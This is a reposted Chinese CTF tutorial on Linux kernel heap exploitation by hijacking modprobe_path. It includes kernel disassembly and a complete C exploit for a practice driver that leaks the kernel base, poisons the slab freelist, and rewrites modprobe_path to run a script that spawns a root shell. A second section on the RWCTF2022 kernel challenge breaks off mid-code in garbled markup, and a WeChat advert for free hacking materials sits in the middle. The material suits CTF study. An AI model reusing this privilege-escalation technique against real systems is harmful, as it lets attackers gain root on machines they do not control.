ToB企服应用市场:ToB评测及商务社交产业平台

标题: Linux kernel 堆溢出使用方法(三) [打印本页]

作者: 魏晓东    时间: 2024-11-27 12:05
标题: Linux kernel 堆溢出使用方法(三)
前言

本文我们通过我们的老朋侪heap_bof来讲解Linux kernel中任意所在申请的其中一种比赛比较常用的使用伎俩modprobe_path(固然在高版本内核已经不可用了但ctf比赛还是比较常用的)。再通过两道近期比赛的赛题来讲解。
Arbitrary Address Allocation

使用思绪

通过 uaf 修改 object 的 free list 指针实现任意所在分配。与 glibc 差别的是,内核的 slub 堆管理器缺少查抄,因此对要分配的目的所在要求不高,不过有一点需要注意:当我们分配到目的所在时会把目的所在前 8 字节的数据会被写入 freelist,而这通常并非一个有效的所在,从而导致 kernel panic,因此在任意所在分配时最好确保目的 object 的 free list 字段为 NULL 。
当能够任意所在分配的时候,与 glibc 改 hook 雷同,在内核中通常修改的是 modprobe_path 。modprobe_path 是内核中的一个变量,其值为 /sbin/modprobe ,因此对于缺少符号的内核文件可以通过搜索 /sbin/modprobe 字符串的方式定位这个变量。
当我们尝试去执行(execve)一个非法的文件(file magic not found),内核会经历如下调用链:
  1. entry_SYSCALL_64()
  2.    sys_execve()
  3.        do_execve()
  4.            do_execveat_common()
  5.                bprm_execve()
  6.                    exec_binprm()
  7.                        search_binary_handler()
  8.                            __request_module() // wrapped as request_module
  9.                                call_modprobe()
复制代码
其中 call_modprobe() 定义于 kernel/kmod.c,我们重要关注这部分代码:
  1. static int call_modprobe(char *module_name, int wait)
  2. {
  3.     //...
  4.     argv[0] = modprobe_path;
  5.     argv[1] = "-q";
  6.     argv[2] = "--";
  7.     argv[3] = module_name;  /* check free_modprobe_argv() */
  8.     argv[4] = NULL;
  9.     info = call_usermodehelper_setup(modprobe_path, argv, envp, GFP_KERNEL,
  10.                      NULL, free_modprobe_argv, NULL);
  11.     if (!info)
  12.         goto free_module_name;
  13.     return call_usermodehelper_exec(info, wait | UMH_KILLABLE);
  14.     //...
复制代码
在这里调用了函数 call_usermodehelper_exec() 将 modprobe_path 作为可执行文件路径以 root 权限将其执行。 我们不难想到的是:如果我们能够劫持 modprobe_path,将其改写为我们指定的恶意脚本的路径,随后我们再执行一个非法文件,内核将会以 root 权限执行我们的恶意脚本。
或者分析vmlinux即可(对于一些没有call_modprobe()符号的直接交叉引用即可)。
  1. __int64 _request_module(
  2.        char a1,
  3.        __int64 a2,
  4.        double a3,
  5.        double a4,
  6.        double a5,
  7.        double a6,
  8.        double a7,
  9.        double a8,
  10.        double a9,
  11.        double a10,
  12.        ...)
  13. {
  14. ......
  15.    if ( v19 )
  16.    {
  17. ......
  18.      v21 = call_usermodehelper_setup(
  19.              (__int64)&byte_FFFFFFFF82444700, // modprobe_path
  20.              (__int64)v18,
  21.              (__int64)&off_FFFFFFFF82444620,
  22.              3264,
  23.              0LL,
  24.              (__int64)free_modprobe_argv,
  25.              0LL);
  26. ......
  27. }
  28. .data:FFFFFFFF82444700 byte_FFFFFFFF82444700             ; DATA XREF: __request_module:loc_FFFFFFFF8108C6D8↑r
  29. .data:FFFFFFFF82444700                 db 2Fh  ; /       ; __request_module+14B↑o ...                      
  30. .data:FFFFFFFF82444701                 db  73h ; s
  31. .data:FFFFFFFF82444702                 db  62h ; b
  32. .data:FFFFFFFF82444703                 db  69h ; i
  33. .data:FFFFFFFF82444704                 db  6Eh ; n
  34. .data:FFFFFFFF82444705                 db  2Fh ; /
  35. .data:FFFFFFFF82444706                 db  6Dh ; m
  36. .data:FFFFFFFF82444707                 db  6Fh ; o
  37. .data:FFFFFFFF82444708                 db  64h ; d
  38. .data:FFFFFFFF82444709                 db  70h ; p
  39. .data:FFFFFFFF8244470A                 db  72h ; r
  40. .data:FFFFFFFF8244470B                 db  6Fh ; o
  41. .data:FFFFFFFF8244470C                 db  62h ; b
  42. .data:FFFFFFFF8244470D                 db  65h ; e
  43. .data:FFFFFFFF8244470E                 db    0
复制代码
exp
  1. #include "src/pwn_helper.h"
  2. #define BOF_MALLOC 5
  3. #define BOF_FREE 7
  4. #define BOF_WRITE 8
  5. #define BOF_READ 9
  6. size_t modprobe_path = 0xFFFFFFFF81E48140;
  7. size_t seq_ops_start = 0xffffffff81228d90;
  8. struct param {
  9.    size_t len;
  10.    size_t *buf;
  11.    long long idx;
  12. };
  13. void alloc_buf(int fd, struct param* p)
  14. {
  15.    printf("[+] kmalloc len:%lu idx:%lld\n", p->len, p->idx);
  16.    ioctl(fd, BOF_MALLOC, p);
  17. }
  18. void free_buf(int fd, struct param* p)
  19. {
  20.    printf("[+] kfree len:%lu idx:%lld\n", p->len, p->idx);
  21.    ioctl(fd, BOF_FREE, p);
  22. }
  23. void read_buf(int fd, struct param* p)
  24. {
  25.    printf("[+] copy_to_user len:%lu idx:%lld\n", p->len, p->idx);
  26.    ioctl(fd, BOF_READ, p);
  27. }
  28. void write_buf(int fd, struct param* p)
  29. {
  30.    printf("[+] copy_from_user len:%lu idx:%lld\n", p->len, p->idx);
  31.    ioctl(fd, BOF_WRITE, p);
  32. }
  33. int main()
  34. {
  35.    // len buf idx
  36.    size_t* buf = malloc(0x500);
  37.    struct param p = {0x20, buf, 0};
  38.    printf("[+] user_buf : %p\n", p.buf);
  39.    int bof_fd = open("/dev/bof", O_RDWR);
  40.    if (bof_fd < 0) {
  41.        puts(RED "[-] Failed to open bof." NONE);
  42.        exit(-1);
  43.    }
  44.    printf(YELLOW "[*] try to leak kbase\n" NONE);
  45.    alloc_buf(bof_fd, &p);
  46.    free_buf(bof_fd, &p);
  47.    int seq_fd = open("/proc/self/stat", O_RDONLY);
  48.    read_buf(bof_fd, &p);
  49.    qword_dump("leak seq_ops", buf, 0x20);
  50.    size_t kernel_offset = buf[0] - seq_ops_start;
  51.    printf(YELLOW "[*] kernel_offset %p\n" NONE, (void*)kernel_offset);
  52.    modprobe_path += kernel_offset;
  53.    printf(LIGHT_BLUE "[*] modprobe_path addr : %p\n" NONE, (void*)modprobe_path);
  54.    
  55.    p.len = 0xa8;
  56.    alloc_buf(bof_fd, &p);
  57.    free_buf(bof_fd, &p);
  58.    read_buf(bof_fd, &p);
  59.    buf[0] = modprobe_path - 0x20;
  60.    write_buf(bof_fd, &p);
  61.    alloc_buf(bof_fd, &p);
  62.    alloc_buf(bof_fd, &p);
  63.    read_buf(bof_fd, &p);
  64.    qword_dump("leak modprobe_path", buf, 0x30);
  65.    strcpy((char *) &buf[4], "/tmp/shell.sh\x00");
  66.    write_buf(bof_fd, &p);
  67.    read_buf(bof_fd, &p);
  68.    qword_dump("leak modprobe_path", buf, 0x30);
  69.    if (open("/shell.sh", O_RDWR) < 0) {
  70.        system("echo '#!/bin/sh' >> /tmp/shell.sh");
  71.        system("echo 'setsid /bin/cttyhack setuidgid 0 /bin/sh' >> /tmp/shell.sh");
  72.        system("chmod +x /tmp/shell.sh");
  73.    }
  74.    system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/fake");
  75.    system("chmod +x /tmp/fake");
  76.    system("/tmp/fake");
  77.    return 0;
  78. }
复制代码
[img=720,279.2842105263158]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202411261416673.png[/img]

【----帮助网安学习,以下所有学习资料免费领!加vx:dctintin,备注 “博客园” 获取!】
 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂口试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)
RWCTF2022 Digging into kernel 1 & 2

题目分析

start.sh
  1. #!/bin/sh
  2. qemu-system-x86_64 \
  3.    -kernel bzImage \
  4.    -initrd rootfs.img \
  5.    -append "console=ttyS0 root=/dev/ram rdinit=/sbin/init quiet noapic kalsr" \
  6.    -cpu kvm64,+smep,+smap \
  7.    -monitor null \
  8.    --nographic \
  9.    -s
复制代码
逆向分析
  1. int __cdecl xkmod_init()
  2. {
  3.  kmem_cache *v0; // rax
  4.  printk(&unk_1E4);
  5.  misc_register(&xkmod_device);
  6.  v0 = (kmem_cache *)kmem_cache_create("lalala", 192LL, 0LL, 0LL, 0LL);
  7.  buf = 0LL;
  8.  s = v0;
  9.  return 0;
  10. }
复制代码
  1. int __fastcall xkmod_release(inode *inode, file *file)
  2. {
  3.  return kmem_cache_free(s, buf); // maybe double free
  4. }
复制代码
[code]void __fastcall xkmod_ioctl(__int64 a1, int a2, __int64 a3){  __int64 data; // [rsp+0h] [rbp-20h] BYREF  unsigned int idx; // [rsp+8h] [rbp-18h]  unsigned int size; // [rsp+Ch] [rbp-14h]  unsigned __int64 v6; // [rsp+10h] [rbp-10h]                                                // v3 __ : 0x8 rsp + 0x0                                                // v4 __ : 0x4 rsp + 0x8                                                // v5 __ : 0x4 rsp + 0xc  v6 = __readgsqword(0x28u);  if ( a3 )  {    copy_from_user(&data, a3, 0x10LL);    if ( a2 == 0x6666666 )    {      if ( buf && size ></strong></p>  

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4